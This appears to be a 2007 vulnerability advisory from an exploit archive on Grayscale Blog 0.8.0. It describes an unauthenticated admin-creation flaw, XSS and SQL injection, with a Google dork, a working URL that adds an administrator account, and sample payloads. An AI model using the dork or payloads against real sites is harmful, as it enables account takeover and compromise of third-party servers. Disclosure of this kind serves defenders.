exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

grayscale-multi.txt

grayscale-multi.txt
Posted Mar 14, 2007
Authored by Omnipresent

Grayscale Blog version 0.8.0 suffers from SQL injection, security bypass, and cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss, sql injection
SHA-256 | 645903ad556da0bc3a0748ca86238ce02c8e413ec53b4ddbd76691e38a5cdfce

grayscale-multi.txt

Change Mirror Download
# Security Advisory - Multiple Vulnerabilities in Grayscale Blog 0.8.0 #

Date : 2007-02-24
Product : Grayscale Blog
Version : 0.8.0 - Prior version maybe also be affected
Vendor : http://sourceforge.net/projects/gsblogger/ - http://www.karlcore.com/programming/blog/

Vendor Status : 2007-02-24 -> Not Informed!
2007-03-02 -> Contacted, waiting reply!
2007-03-09 -> Vendor never replyed

Source : omnipresent - omni
E-mail : omnipresent[at]email[dot]it

Google Dork : "Powered by Grayscale Blog"


Security Issues :

1.) Security Query Bypass: [TESTED]

A user can do lots of stuff with some php scripts located in the directory "/scripts/", for example:

add_user.php - Security Bypass

// $user_id=$_REQUEST['user_id']; // not used
$user_loginname=$_REQUEST['user_loginname'];
$user_password=$_REQUEST['user_password'];
$user_real_name=$_REQUEST['user_real_name'];
$user_email=$_REQUEST['user_email'];
// $user_date_added=$_REQUEST['user_date_added']; // not used
// $user_lastmod=$_REQUEST['user_lastmod']; // not used
$user_permissions=$_REQUEST['user_permissions'];
$user_added_by=$_REQUEST['user_added_by'];
$user_lastmod_by=$_REQUEST['user_lastmod_by'];
$user_allow=$_REQUEST['user_allow'];

// define the query
$query = "INSERT INTO blog_users (user_loginname, user_password, user_real_name, user_email, user_date_added, user_lastmod, user_permissions, user_added_by, user_lastmod_by, user_allow )
values ('$user_loginname', '$user_password', '$user_real_name', '$user_email', NOW(), NOW(), '$user_permissions', '$user_added_by', '$user_lastmod_by', '$user_allow')";

As you can see the code there are no security restriction for any users!! Everyone can add a user with Administrator Privilege ($user_permissions = 3).

Other files affected by some security issues, like the above, are:

-addblog.php
-editblog.php
-editlinks.php
-edit_users.php
-add_links.php

Example:

http://vulnerable_server/path/scripts/add_users.php?user_loginname=HACK_USER&user_password=HACK_USER&user_real_name=real&user_email=os@so.net&user_permissions=3&user_added_by=1&user_lastmod_by=1&user_allow=1

And you have admin rights!

2.) XSS Vulnerability: [TESTED]

Security issue in the following files:

-"/scripts/addblog_comment.php" -> variables are not properly sanitized before being used in the query string
-"detail.php" -> variables are not properly sanitized before being used in the query string (query2 -> blog_comments)

Example:

You can put in the comment fields the following script:

<script>alert("XSS")</script>


3.) SQL Injection vulnerability: [NOT TESTED]

In lots of files variables are not properly sanitized before being used, these files are, for example:

-userdetail.php -> id variable
-jump.php -> id variable and url variable for our redirect
-detail.php -> id variable

Example:

http://vulnerable_server/path/detail.php?id=1;[SQL INJECTION]

.:. Patches:

0x0 No vendor patches released!
0x1 Edit the source code to ensure that input is properly verified.
Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    24 Files
  • 11
    Jul 11th
    25 Files
  • 12
    Jul 12th
    11 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    0 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close